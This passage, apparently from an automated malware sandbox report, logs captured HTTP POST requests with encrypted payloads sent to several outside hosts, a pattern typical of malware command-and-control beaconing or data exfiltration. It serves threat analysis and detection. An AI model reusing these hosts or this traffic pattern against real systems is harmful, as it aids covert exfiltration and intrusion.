6e 52 70 4f 53 33 7a 4d 76 72 6c 4d 2f 37 6e 55 58 38 62 79 54 6c 42 4f 37 4d 4b 45 65 6d 44 4d 48 72 54 78 65 4e 68 30 7a 57 75 75 6b 68 62 44 73 6f 77 41 6f 54 77 43 77 56 68 73 46 53 4b 44 45 53 43 6a 67 4a 37 36 6c 59 61 6b 38 72 68 46 41 51 38 2b 59 4a 64 39 6d 64 77 72 4a 4b 6d 65 68 73 77 50 6c 31 48 61 6c 67 53 50 62 41 47 2f 79 30 67 53 72 78 7a 6a 76 69 77 38 51 4f 69 37 6d 2b 59 50 49 73 66 4a 6b 49 46 33 55 59 4a 42 65 54 49 48 62 4f 5a 64 36 5a 74 36 79 79 70 6c 34 65 6b 76 32 78 71 79 51 48 43 42 49 4b 6c 38 41 7a 73 67 75 54 74 77 77 4c 44 75 5a 79 54 2f 36 30 42 75 4d 35 52 58 30 4e 70 6c 36 34 42 35 6c 49 61 50 46 6a 48 6b 53 44 57 69 74 74 70 46 30 78 44 58 54 43 66 33 5a 55 4a 2f 47 63 6f 45 79 7a 59 31 57 51 51 66 45 5a 6c 54 6d 71 30 38 48 68 74 31 45 51 50 4d 35 44 68 76 4d 66 72 47 55 64 58 69 4a 53 55 50 39 72 53 4f 45 66 58 4a 76 32 71 43 41 3d 3d Data Ascii: GvKAACnimNcy8dHw+MVPL0IwfLTHWk/Lbc8FE0F+Ch8ePlcJtkjHCQkwUFsOO0C3Wg4D3FxKrkc7J+UorfwZZO2zMYdKxCnjajGc7SxLbbxECxr8xqSPuLH4U5oBoAFQhKRrPfGw4UXx/2qUKdx2pckREkkzJSWT328LqtYuFHLDaslwxmausTBq+1dh9k/nGHkDJC8X1vM6+dc1dHG4YborZS0yl7Eej3py4Sf0BDDlM1E/mNgUIEC+ycqOE+JjdHlUPzs/N6WrMn3mfgdHT6fyJYZ/NxxxToWlxkVAbnRpOS3zMvrlM/7nUX8byTlBO7MKEemDMHrTxeNh0zWuukhbDsowAoTwCwVhsFSKDESCjgJ76lYak8rhFAQ8+YJd9mdwrJKmehswPl1HalgSPbAG/y0gSrxzjviw8QOi7m+YPIsfJkIF3UYJBeTIHbOZd6Zt6yypl4ekv2xqyQHCBIKl8AzsguTtwwLDuZyT/60BuM5RX0Npl64B5lIaPFjHkSDWittpF0xDXTCf3ZUJ/GcoEyzY1WQQfEZlTmq08Hht1EQPM5DhvMfrGUdXiJSUP9rSOEfXJv2qCA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.petsfan.comCache-Control: no-cacheData Raw: 67 35 63 36 44 6b 4e 55 6d 64 63 50 33 4b 73 2b 53 75 78 56 67 57 7a 66 65 43 6e 70 39 33 41 66 4a 79 61 46 55 76 54 6e 56 4a 37 4b 77 51 68 48 52 5a 74 63 67 59 46 58 53 69 42 36 57 35 75 49 67 39 46 2f 52 6e 4b 6d 4a 69 54 4b 5a 55 6f 7a 71 36 36 79 65 58 4c 61 48 58 52 41 58 6d 37 76 6c 6f 78 66 30 32 31 74 38 2b 44 6a 45 61 6d 33 6b 53 6a 33 37 5a 31 36 72 67 2f 77 4a 4a 55 58 58 52 48 36 33 72 35 64 70 76 35 33 4b 74 55 7a 4d 54 36 61 6a 65 4f 47 53 54 76 63 59 34 76 68 68 38 6b 66 79 32 33 2b 54 71 67 77 57 36 4a 39 46 57 31 2b 30 4a 33 58 44 2b 44 79 77 6d 42 46 70 38 68 53 6b 52 51 33 42 63 54 71 74 33 65 36 44 4e 58 35 36 32 2b 68 4b 34 49 4c 44 35 35 64 37 53 49 31 64 45 54 76 6f 56 57 2f 4d 55 61 70 47 45 47 49 43 2f 34 74 45 35 32 52 74 56 69 35 75 30 45 39 78 74 4a 35 30 38 2b 46 7a 6a 6e 42 78 6d 75 6e 42 71 54 58 4b 47 6e 38 2b 38 4e 64 57 2b 75 53 32 7a 66 2b 38 4d 70 6b 6f 64 36 43 48 64 35 4a 4d 73 52 48 53 44 50 2f 52 33 53 66 7a 34 65 6c 66 38 57 4f 45 50 34 78 55 73 2b 48 77 4e 46 72 65 69 41 49 69 57 69 32 34 35 7a 6b 79 61 4a 5a 79 6c 66 2b 68 63 6a 68 78 42 34 54 6c 66 53 76 67 46 47 48 6c 66 75 34 73 66 39 49 6a 2f 2f 6c 68 64 4a 61 71 58 34 4f 50 75 46 2b 33 78 55 75 2f 59 48 68 57 32 6d 74 35 57 54 57 48 59 46 4f 6e 64 5a 38 51 34 2f 6d 6b 53 62 59 54 55 68 4b 31 54 78 66 2f 48 49 32 72 73 63 6a 70 77 37 64 7a 52 6c 5a 4f 79 34 42 64 51 47 46 34 6e 49 75 33 78 38 7a 4f 54 69 6e 68 43 42 56 7a 31 56 33 76 52 68 35 36 69 2b 72 6d 47 67 4a 50 51 57 6e 4b 67 77 32 46 59 4f 33 63 6a 33 48 69 61 6f 45 55 67 4f 37 72 30 55 39 52 6d 7a 53 70 43 78 7a 48 6b 49 41 46 67 6e 67 75 6e 6a 62 43 62 75 67 4f 4f 30 59 61 54 6a 4c 35 57 79 72 66 56 5a 72 4e 41 33 58 55 72 70 64 72 43 64 74 6a 33 4e 75 5a 31 4e 71 49 44 2f 70 41 41 5a 72 4b 49 59 3d Data Ascii: g5c6DkNUmdcP3Ks+SuxVgWzfeCnp93AfJyaFUvTnVJ7KwQhHRZtcgYFXSiB6W5uIg9F/RnKmJiTKZUozq66yeXLaHXRAXm7vloxf021t8+DjEam3kSj37Z16rg/wJJUXXRH63r5dpv53KtUzMT6ajeOGSTvcY4vhh8kfy23+TqgwW6J9FW1+0J3XD+DywmBFp8hSkRQ3BcTqt3e6DNX562+hK4ILD55d7SI1dETvoVW/MUapGEGIC/4tE52RtVi5u0E9xtJ508+FzjnBxmunBqTXKGn8+8NdW+uS2zf+8Mpkod6CHd5JMsRHSDP/R3Sfz4elf8WOEP4xUs+HwNFreiAIiWi245zkyaJZylf+hcjhxB4TlfSvgFGHlfu4sf9Ij//lhdJaqX4OPuF+3xUu/YHhW2mt5WTWHYFOndZ8Q4/mkSbYTUhK1Txf/HI2rscjpw7dzRlZOy4BdQGF4nIu3x8zOTinhCBVz1V3vRh56i+rmGgJPQWnKgw2FYO3cj3HiaoEUgO7r0U9RmzSpCxzHkIAFgngunjbCbugOO0YaTjL5WyrfVZrNA3XUrpdrCdtj3NuZ1NqID/pAAZrKIY=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vazir.seCache-Control: no-cacheCookie: snkz=84.17.52.43; btst=e20fe2c1455c3e9c8427fe86f0881e8c|84.17.52.43|1690487014|1690486975|11|3|0Data Raw: 35 6b 72 4b 43 4a 4b 47 69 4e 65 5a 55 69 62 49 52 66 51 39 75 4a 56 31 76 53 37 69 6c 53 62 48 35 75 32 39 72 59 36 31 72 76 32 4d 75 63 64 34 67 45 67 6a 30 36 58 70 46 53 79 69 42 41 55 2f 64 71 74 6e 35 79 41 76 46 72 44 75 44 4f 4c 37 39 42 41 38 67 68 32 30 77 38 42 5a 76 46 2f 2b 36 45 54 66 66 4b 2f 71 4f 74 50 49 51 31 2b 62 61 4c 6c 49 46 6e 6f 2b 64 33 79 61 31 4c 57 77 32 66 6f 39 62 49 67 4b 63 6e 74 49 38 4c 56 65 6b 72 71 78 2f 31 79 64 53 4f 77 78 47 36 36 53 44 71 45 63 78 4c 62 32 2b 38 42 51 35 2f 6d 34 30 47 34 2f 56 75 45 6a 68 70 48 79 4a 48 56 38 76 45 76 68 57 71 4a 37 48 33 35 56 2b 6e 66 54 2f 39 34 63 58 4d 4b 6b 49 2f 63 2f 43 65 6e 36 50 37 78 58 34 5a 36 6b 53 77 76 76 45 36 54 38 57 37 41 5a 75 69 4f 6b 58 6b 70 6d 75 2f 56 30 33 48 6d 43 6a 49 4c 51 36 75 6e 78 35 69 36 49 78 48 59 61 2f 6a 69 43 47 55 79 6f 42 51 55 44 67 43 73 65 2f 41 31 6e 2b 72 59 58 32 57 54 51 45 6c 39 30 46 47 75 36 72 5a 75 4b 64 79 37 65 6e 74 50 33 6b 4a 31 6c 38 56 33 4b 42 6d 4d 49 30 4f 75 48 2b 79 45 50 6f 38 39 63 61 65 4a 58 57 6a 62 2f 46 54 51 65 4d 45 41 31 34 78 34 33 46 44 4c 2f 49 54 4f 79 47 64 6a 4d 69 4c 33 55 51 74 47 56 77 36 45 31 57 70 78 55 54 52 63 70 67 42 6b 4b 62 4b 34 54 68 48 67 6a 30 36 35 2f 4b 35 43 56 67 6d 73 37 68 6b 61 50 53 4a 32 50 6c 46 38 72 2b 4a 43 63 79 51 4d 36 44 71 52 52 4e 79 77 64 42 77 67 4c 74 2f 6f 2f 6a 4a 67 59 67 4e 35 70 45 56 65 6f 77 43 70 4c 50 75 4e 6c 46 4d 59 6c 4b 43 52 6a 71 4a 38 4d 57 71 43 4b 67 4e 7a 5a 2b 38 6e 5a 4b 4a 69 6e 62 41 71 73 6f 48 46 75 4f 35 76 33 54 34 66 38 43 49 75 34 65 52 4b 70 6f 34 6b 75 78 43 61 2f 64 39 34 4e 47 78 59 4e 4c 6e 77 45 62 65 78 46 54 4d 46 4a 33 65 6f 45 66 67 3d 3d Data Ascii: 5krKCJKGiNeZUibIRfQ9uJV1vS7ilSbH5u29rY61rv2Mucd4gEgj06XpFSyiBAU/dqtn5yAvFrDuDOL79BA8gh20w8BZvF/+6ETffK/qOtPIQ1+baLlIFno+d3ya1LWw2fo9bIgKcntI8LVekrqx/1ydSOwxG66SDqEcxLb2+8BQ5/m40G4/VuEjhpHyJHV8vEvhWqJ7H35V+nfT/94cXMKkI/c/Cen6P7xX4Z6kSwvvE6T8W7AZuiOkXkpmu/V03HmCjILQ6unx5i6IxHYa/jiCGUyoBQUDgCse/A1n+rYX2WTQEl90FGu6rZuKdy7entP3kJ1l8V3KBmMI0OuH+yEPo89caeJXWjb/FTQeMEA14x43FDL/ITOyGdjMiL3UQtGVw6E1WpxUTRcpgBkKbK4ThHgj065/K5CVgms7hkaPSJ2PlF8r+JCcyQM6DqRRNywdBwgLt/o/jJgYgN5pEVeowCpLPuNlFMYlKCRjqJ8MWqCKgNzZ+8nZKJinbAqsoHFuO5v3T4f8CIu4eRKpo4kuxCa/d94NGxYNLnwEbexFTMFJ3eoEfg==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.tvtools.fiCache-Control: no-cacheData Raw: 30 56 56 36 4b 32 78 48 6d 74 65 53 30 30 69 38 56 35 74 46 6f 58 38 64 64 47 48 45 71 43 36 48 59 4a 2f 61 6a 59 61 71 51 74 59 2b 44 57 59 68 39 4b 6b 53 62 77 77 32 50 66 7a 58 51 48 78 6c 39 53 35 32 66 35 55 53 6c 73 39 44 4a 55 30 61 49 34 6d 64 66 63 34 4a 4d 6b 49 50 71 38 62 64 43 4d 71 74 71 48 73 64 54 36 52 49 58 5a 56 67 78 69 39 61 52 48 4d 48 34 41 53 43 44 71 6b 42 5a 45 31 57 50 49 53 55 38 6d 67 31 6d 43 46 4e 74 56 4c 76 4f 73 48 31 55 54 46 59 62 4b 4f 54 39 50 67 58 44 70 4c 70 75 59 6d 56 72 47 49 65 41 50 42 33 4b 52 74 49 43 6d 76 31 36 61 70 6a 33 42 63 71 48 71 37 73 49 48 6f 6f 31 55 71 6b 4c 31 35 63 34 38 64 76 4a 33 6d 6b 76 61 50 67 4d 4b 59 37 47 45 31 4d 38 6f 62 62 4c 44 4c 73 66 64 6a 64 42 59 69 7a 75 35 31 65 31 42 78 31 67 39 50 62 2b 63 2b 38 43 4f 68 4e 4e 69 31 48 55 6e 71 61 76 32 72 71 38 53 2f 31 74 34 54 36 79 6a 7a 6e 42 4d 69 67 37 7a 57 34 76 43 68 2f 46 47 62 4c 69 39 53 70 73 2f 2b 74 63 38 42 54 33 2b 41 6f 43 79 38 68 67 50 48 2b 78 4a 54 58 69 38 6f 58 48 71 68 59 48 57 49 66 32 51 65 4b 52 72 6d 79 64 39 73 59 4b 78 48 6e 2b 59 62 42 75 37 72 6f 56 2b 2b 59 32 42 37 42 32 2f 30 37 53 70 59 49 55 75 63 4d 56 4d 54 5a 78 30 4a 51 36 54 32 59 72 45 5a 68 64 76 35 50 66 77 4d 74 30 55 79 42 56 4f 55 70 36 71 76 65 2b 6e 4c 33 64 50 7a 43 7a 5a 54 4d 5a 32 2f 4c 55 55 34 38 76 79 67 72 53 69 67 73 6b 31 38 6a 30 5a 33 77 46 72 47 50 7a 37 51 31 71 37 39 4a 2f 2f 44 4a 42 58 6c 76 67 45 51 4e 69 74 58 4c 63 76 78 2f 71 48 79 48 65 45 50 2f 42 57 75 51 45 43 44 76 75 65 57 46 44 6e 72 72 74 79 31 4f 47 37 4a 54 42 54 2b 62 49 65 4d 71 4c 39 49 73 4d 45 77 73 44 47 68 48 2b 30 46 2b 68 6e 44 6a 6a 6f 57 52 50 64 68 31 79 44 4d 56 61 68 62 45 Data Ascii: 0VV6K2xHmteS00i8V5tFoX8ddGHEqC6HYJ/ajYaqQtY+DWYh9KkSbww2PfzXQHxl9S52f5USls9DJU0aI4mdfc4JMkIPq8bdCMqtqHsdT6RIXZVgxi9aRHMH4ASCDqkBZE1WPISU8mg1mCFNtVLvOsH1UTFYbKOT9PgXDpLpuYmVrGIeAPB3KRtICmv16apj3BcqHq7sIHoo1UqkL15c48dvJ3mkvaPgMKY7GE1M8obbLDLsfdjdBYizu51e1Bx1g9Pb+c+8COhNNi1HUnqav2rq8S/1t4T6yjznBMig7zW4vCh/FGbLi9Sps/+tc8BT3+AoCy8hgPH+xJTXi8oXHqhYHWIf2QeKRrmyd9sYKxHn+YbBu7roV++Y2B7B2/07SpYIUucMVMTZx0JQ6T2YrEZhdv5PfwMt0UyBVOUp6qve+nL3dPzCzZTMZ2/LUU48vygrSigsk18j0Z3wFrGPz7Q1q79J//DJBXlvgEQNitXLcvx/qHyHeEP/BWuQECDvueWFDnrrty1OG7JTBT+bIeMqL9IsMEwsDGhH+0F+hnDjjoWRPdh1yDMVahbE
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.otena.comCache-Control: no-cacheData Raw: 54 54 57 6c 59 32 49 61 6e 4e 63 7a 78 7a 5a 79 31 56 5a 78 39 65 58 4a 53 45 72 79 54 61 4c 73 74 68 61 45 6b 45 78 31 53 70 77 38 63 43 2b 65 38 44 76 54 2f 53 36 6e 2b 59 48 31 6f 37 52 37 6d 73 33 73 35 4c 55 30 75 66 33 38 53 36 44 61 6a 74 4b 57 47 6c 68 33 46 2b 61 5a 34 72 41 4d 68 56 7a 53 37 68 79 31 4b 4b 4f 51 75 77 41 65 53 4d 6e 49 7a 4f 5a 54 75 78 45 4c 67 67 6f 32 79 71 53 47 32 4d 35 2b 53 79 79 71 78 59 5a 39 4c 6a 65 4f 33 36 35 2f 35 69 4b 4f 37 51 57 4f 56 2b 69 4d 61 57 6d 32 42 4c 6e 54 4b 49 39 70 42 35 72 4c 75 53 52 54 44 54 2f 42 52 41 4e 36 77 46 50 42 57 73 78 72 78 32 4f 64 2b 49 4a 45 54 54 73 76 59 56 64 76 51 48 65 59 67 4d 32 35 58 74 71 71 69 69 70 65 67 48 50 66 77 51 44 59 43 47 65 35 50 4b 71 35 6f 51 68 79 36 42 67 41 45 4a 43 4e 33 63 45 79 66 46 6b 4c 37 6a 66 6a 66 7a 39 71 36 42 74 59 51 57 48 2f 63 67 64 66 66 4f 44 33 46 43 4c 62 35 4a 51 30 46 61 41 6c 42 4a 52 55 37 43 62 32 30 66 59 56 72 4b 75 30 6c 33 36 4f 71 63 66 6d 52 6b 66 33 70 65 66 55 2b 64 74 63 68 37 4c 76 36 76 55 42 58 50 4b 49 4c 30 53 54 30 64 77 74 4e 71 37 79 2f 51 59 61 64 4a 6e 5a 31 41 62 65 43 53 6f 39 37 68 33 33 6d 61 31 6c 48 4c 39 5a 6a 70 74 54 7a 6f 2b 72 6e 70 61 65 70 53 7a 71 45 56 4e 45 31 7a 4b 36 6d 31 4d 55 48 63 46 79 59 62 54 4d 77 58 4c 6b 38 2b 78 76 4c 45 34 45 54 62 7a 52 45 77 43 6b 51 7a 33 63 64 31 2b 62 63 54 38 35 77 69 2b 4d 4e 76 41 2b 71 67 52 48 42 61 64 45 47 66 79 42 6f 71 45 64 56 63 52 41 31 56 66 6a 7a 31 79 79 5a 37 74 56 54 73 44 75 70 58 48 39 4d 5a 4f 64 6b 6d 54 7a 56 73 33 39 49 7a 6b 75 64 35 6d 77 67 6e 73 35 2b 57 6d 76 50 54 4d 53 4f 6a 74 64 30 55 74 73 51 6a 57 63 45 48 7a 61 61 62 53 62 34 4b 6a 47 6c 78 32 77 66 44 36 64 4e 36 50 70 75 37 78 4c 52 4c 55 4e 71 4e 32 65 68 74 59 3d Data Ascii: TTWlY2IanNczxzZy1VZx9eXJSEryTaLsthaEkEx1Spw8cC+e8DvT/S6n+YH1o7R7ms3s5LU0uf38S6DajtKWGlh3F+aZ4rAMhVzS7hy1KKOQuwAeSMnIzOZTuxELggo2yqSG2M5+SyyqxYZ9LjeO365/5iKO7QWOV+iMaWm2BLnTKI9pB5rLuSRTDT/BRAN6wFPBWsxrx2Od+IJETTsvYVdvQHeYgM25XtqqiipegHPfwQDYCGe5PKq5oQhy6BgAEJCN3cEyfFkL7jfjfz9q6BtYQWH/cgdffOD3FCLb5JQ0FaAlBJRU7Cb20fYVrKu0l36OqcfmRkf3pefU+dtch7Lv6vUBXPKIL0ST0dwtNq7y/QYadJnZ1AbeCSo97h33ma1lHL9ZjptTzo+rnpaepSzqEVNE1zK6m1MUHcFyYbTMwXLk8+xvLE4ETbzREwCkQz3cd1+bcT85wi+MNvA+qgRHBadEGfyBoqEdVcRA1Vfjz1yyZ7tVTsDupXH9MZOdkmTzVs39Izkud5mwgns5+WmvPTMSOjtd0UtsQjWcEHzaabSb4KjGlx2wfD6dN6Ppu7xLRLUNqN2ehtY=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.transsib.comCache-Control: no-cacheData Raw: 31 66 32 37 46 76 6d 61 6d 64 65 62 34 30 70 45 69 41 68 4d 68 5a 4c 78 34 42 54 58 69 30 4b 32 50 57 32 42 5a 4e 34 2b 38 30 2b 4f 52 68 7a 58 4f 55 5a 67 6d 52 63 55 50 61 6e 52 42 59 67 67 69 6a 61 30 38 76 78 58 41 38 53 6c 4e 4a 61 35 56 53 34 34 2f 2b 33 74 33 59 51 71 61 46 35 4f 55 33 57 4e 6f 56 75 49 6d 31 31 62 39 2f 46 2f 43 7a 76 2f 68 38 65 2f 74 63 36 73 74 49 6d 34 74 4a 47 76 46 41 6b 73 62 56 33 42 50 6a 4b 54 75 32 4d 68 4f 30 2b 59 4c 6b 6d 4e 31 59 63 71 5a 33 53 6d 4f 58 39 30 56 36 37 2f 56 70 67 35 6c 55 52 61 46 77 4a 4a 56 6e 7a 33 64 56 33 56 6f 57 66 39 50 37 58 37 55 4c 4d 62 67 66 30 2f 6d 58 67 72 72 68 43 54 33 30 34 63 2b 45 32 56 4e 48 45 4c 51 54 6c 57 32 79 49 64 74 78 58 56 74 43 54 59 56 34 48 71 30 4b 6b 46 32 7a 37 2f 71 37 46 45 55 35 32 67 2f 36 38 52 66 45 71 44 68 76 47 45 77 74 72 6b 76 39 42 61 39 4d 44 39 34 38 69 53 4a 66 53 63 48 79 57 39 4a 43 63 45 4a 4c 44 32 72 7a 36 79 39 4f 2b 44 6e 67 64 6e 51 49 42 2f 34 4f 35 69 35 5a 36 39 4e 49 4e 4d 2f 2b 70 52 78 63 46 6b 6f 46 68 76 69 61 7a 66 55 47 49 41 33 48 50 36 69 41 44 47 79 50 68 34 39 7a 70 71 31 2f 63 59 44 4d 44 70 46 6f 45 30 36 32 4e 43 6e 6e 7a 62 6f 37 66 49 43 7a 51 30 76 7a 6b 44 56 4f 55 6c 55 71 66 64 36 6d 55 6a 52 33 48 44 55 51 6c 45 49 42 58 52 72 6b 37 39 4c 4f 6a 76 34 79 6c 44 36 79 74 50 52 58 57 57 65 61 79 51 7a 7a 79 58 63 64 72 67 71 74 6f 76 56 57 76 72 47 59 4a 4d 44 7a 44 41 6a 6b 2b 46 45 38 36 52 42 52 63 69 4f 44 43 67 65 2b 50 68 5a 76 4b 75 36 6d 34 7a 52 70 6e 6a 5a 55 6f 37 46 72 44 53 48 52 53 58 56 41 50 73 76 32 48 44 54 63 46 32 5a 71 2b 65 4c 69 77 3d Data Ascii: 1f27Fvmamdeb40pEiAhMhZLx4BTXi0K2PW2BZN4+80+ORhzXOUZgmRcUPanRBYggija08vxXA8SlNJa5VS44/+3t3YQqaF5OU3WNoVuIm11b9/F/Czv/h8e/tc6stIm4tJGvFAksbV3BPjKTu2MhO0+YLkmN1YcqZ3SmOX90V67/Vpg5lURaFwJJVnz3dV3VoWf9P7X7ULMbgf0/mXgrrhCT304c+E2VNHELQTlW2yIdtxXVtCTYV4Hq0KkF2z7/q7FEU52g/68RfEqDhvGEwtrkv9Ba9MD948iSJfScHyW9JCcEJLD2rz6y9O+DngdnQIB/4O5i5Z69NINM/+pRxcFkoFhviazfUGIA3HP6iADGyPh49zpq1/cYDMDpFoE062NCnnzbo7fICzQ0vzkDVOUlUqfd6mUjR3HDUQlEIBXRrk79LOjv4ylD6ytPRXWWeayQzzyXcdrgqtovVWvrGYJMDzDAjk+FE86RBRciODCge+PhZvKu6m4zRpnjZUo7FrDSHRSXVAPsv2HDTcF2Zq+eLiw=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ka-mo-me.comCache-Control: no-cacheData Raw: 42 4a 37 44 75 6d 6e 6d 45 42 43 4b 63 63 70 2b 4f 48 78 5a 53 59 49 43 50 73 73 48 52 4a 52 50 72 54 63 56 6e 64 76 63 37 49 50 65 64 58 70 65 5a 39 66 49 54 41 4c 2b 65 78 68 44 32 7a 67 75 57 4f 61 75 36 4e 43 77 35 4f 76 53 6b 55 74 58 68 2f 35 57 75 6b 45 38 4e 32 76 42 6a 74 36 59 4a 71 39 65 47 62 71 30 6f 53 62 4d 46 78 57 42 78 32 66 31 69 7a 62 61 36 53 31 6e 72 31 55 45 44 52 36 69 38 53 56 44 30 58 42 36 36 42 45 45 53 73 4e 67 34 7a 4f 47 78 50 53 76 39 63 58 45 6c 6c 6b 49 2b 2b 36 33 4f 61 33 7a 74 42 44 6f 77 52 52 66 49 31 49 33 6e 42 34 2b 42 75 53 43 4c 48 6f 70 73 76 4e 46 52 4b 78 68 5a 69 57 46 32 37 64 65 4b 45 53 2b 56 70 65 45 72 4a 75 46 56 67 6a 2f 77 44 76 70 70 33 78 55 6b 30 4f 75 5a 68 42 38 6c 7a 2b 55 71 31 56 36 56 59 51 69 71 31 6d 36 39 75 36 65 2f 45 71 32 35 74 69 67 70 73 57 67 35 31 32 5a 4f 5a 61 45 72 58 36 4f 4e 61 46 77 56 74 67 74 69 61 6a 69 51 66 66 59 65 2b 69 47 43 50 56 64 37 65 6c 32 4f 66 49 55 6a 48 49 50 35 30 77 6f 53 78 6a 52 70 2f 51 6a 6b 37 62 4e 70 61 75 58 45 58 51 53 62 65 59 66 31 6b 70 63 73 56 4b 52 54 44 41 62 46 4b 47 77 34 6b 68 6a 7a 6b 34 41 37 6a 49 31 71 43 2b 49 4a 57 46 68 38 51 6c 52 57 53 6d 65 4d 6b 37 6a 63 33 61 6f 67 7a 74 46 59 44 6c 47 48 33 51 4f 78 79 54 57 2b 70 65 78 66 61 61 34 51 51 6f 39 33 39 42 71 4c 57 33 32 39 4e 4e 44 6b 69 72 42 7a 4c 6d 74 6e 36 54 4e 69 4d 69 31 59 48 71 78 54 41 38 6b 79 41 74 42 74 57 76 64 6d 71 6d 36 32 55 4c 4d 6f 6a 2f 39 6d 34 2f 31 6d 73 73 6c 46 61 69 62 46 30 4b 32 75 4f 50 74 36 6f 2b 55 62 36 39 45 49 37 78 4b 6e 76 45 67 4d 4c 4a 45 49 68 48 2f 6f 33 6b 52 33 54 68 34 71 45 79 4d 64 67 77 2b 62 61 4b 47 30 30 43 51 39 59 45 37 4b 32 4b 52 59 4f 53 53 63 63 71 55 Data Ascii: BJ7DumnmEBCKccp+OHxZSYICPssHRJRPrTcVndvc7IPedXpeZ9fITAL+exhD2zguWOau6NCw5OvSkUtXh/5WukE8N2vBjt6YJq9eGbq0oSbMFxWBx2f1izba6S1nr1UEDR6i8SVD0XB66BEESsNg4zOGxPSv9cXEllkI++63Oa3ztBDowRRfI1I3nB4+BuSCLHopsvNFRKxhZiWF27deKES+VpeErJuFVgj/wDvpp3xUk0OuZhB8lz+Uq1V6VYQiq1m69u6e/Eq25tigpsWg512ZOZaErX6ONaFwVtgtiajiQffYe+iGCPVd7el2OfIUjHIP50woSxjRp/Qjk7bNpauXEXQSbeYf1kpcsVKRTDAbFKGw4khjzk4A7jI1qC+IJWFh8QlRWSmeMk7jc3aogztFYDlGH3QOxyTW+pexfaa4QQo939BqLW329NNDkirBzLmtn6TNiMi1YHqxTA8kyAtBtWvdmqm62ULMoj/9m4/1msslFaibF0K2uOPt6o+Ub69EI7xKnvEgMLJEIhH/o3kR3Th4qEyMdgw+baKG00CQ9YE7K2KRYOSSccqU
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mqs.com.brCache-Control: no-cacheCookie: _mcnc=1; __goc_session__=mmikjcccpacmhhypnhsmmibzvjxnzchhData Raw: 47 76 4b 41 41 43 6e 69 6d 4e 63 79 38 64 48 77 2b 4d 56 50 4c 30 49 77 66 4c 54 48 57 6b 2f 4c 62 63 38 46 45 30 46 2b 43 68 38 65 50 6c 63 4a 74 6b 6a 48 43 51 6b 77 55 46 73 4f 4f 30 43 33 57 67 34 44 33 46 78 4b 72 6b 63 37 4a 2b 55 6f 72 66 77 5a 5a 4f 32 7a 4d 59 64 4b 78 43 6e 6a 61 6a 47 63 37 53 78 4c 62 62 78 45 43 78 72 38 78 71 53 50 75 4c 48 34 55 35 6f 42 6f 41 46 51 68 4b 52 72 50 66 47 77 34 55 58 78 2f 32 71 55 4b 64 78 32 70 63 6b 52 45 6b 6b 7a 4a 53 57 54 33 32 38 4c 71 74 59 75 46 48 4c 44 61 73 6c 77 78 6d 61 75 73 54 42 71 2b 31 64 68 39 6b 2f 6e 47 48 6b 44 4a 43 38 58 31 76 4d 36 2b 64 63 31 64 48 47 34 59 62 6f 72 5a 53 30 79 6c 37 45 65 6a 33 70 79 34 53 66 30 42 44 44 6c 4d 31 45 2f 6d 4e 67 55 49 45 43 2b 79 63 71 4f 45 2b 4a 6a 64 48 6c 55 50 7a 73 2f 4e 36 57 72 4d 6e 33 6d 66 67 64 48 54 36 66 79 4a 59 5a 2f 4e 78 78 78 54 6f 57 6c 78 6b 56 41 62 6e 52 70 4f 53 33 7a 4d 76 72 6c 4d 2f 37 6e 55 58 38 62 79 54 6c 42 4f 37 4d 4b 45 65 6d 44 4d 48 72 54 78 65 4e 68 30 7a 57 75 75 6b 68 62 44 73 6f 77 41 6f 54 77 43 77 56 68 73 46 53 4b 44 45 53 43 6a 67 4a 37 36 6c 59 61 6b 38 72 68 46 41 51 38 2b 59 4a 64 39 6d 64 77 72 4a 4b 6d 65 68 73 77 50 6c 31 48 61 6c 67 53 50 62 41 47 2f 79 30 67 53 72 78 7a 6a 76 69 77 38 51 4f 69 37 6d 2b 59 50 49 73 66 4a 6b 49 46 33 55 59 4a 42 65 54 49 48 62 4f 5a 64 36 5a 74 36 79 79 70 6c 34 65 6b 76 32 78 71 79 51 48 43 42 49 4b 6c 38 41 7a 73 67 75 54 74 77 77 4c 44 75 5a 79 54 2f 36 30 42 75 4d 35 52 58 30 4e 70 6c 36 34 42 35 6c 49 61 50 46 6a 48 6b 53 44 57 69 74 74 70 46 30 78 44 58 54 43 66 33 5a 55 4a 2f 47 63 6f 45 79 7a 59 31 57 51 51 66 45 5a 6c 54 6d 71 30 38 48 68 74 31 45 51 50 4d 35 44 68 76 4d 66 72 47 55 64 58 69 4a 53 55 50 39 72 53 4f 45 66 58 4a 76 32 71 43 41 3d 3d Data Ascii: 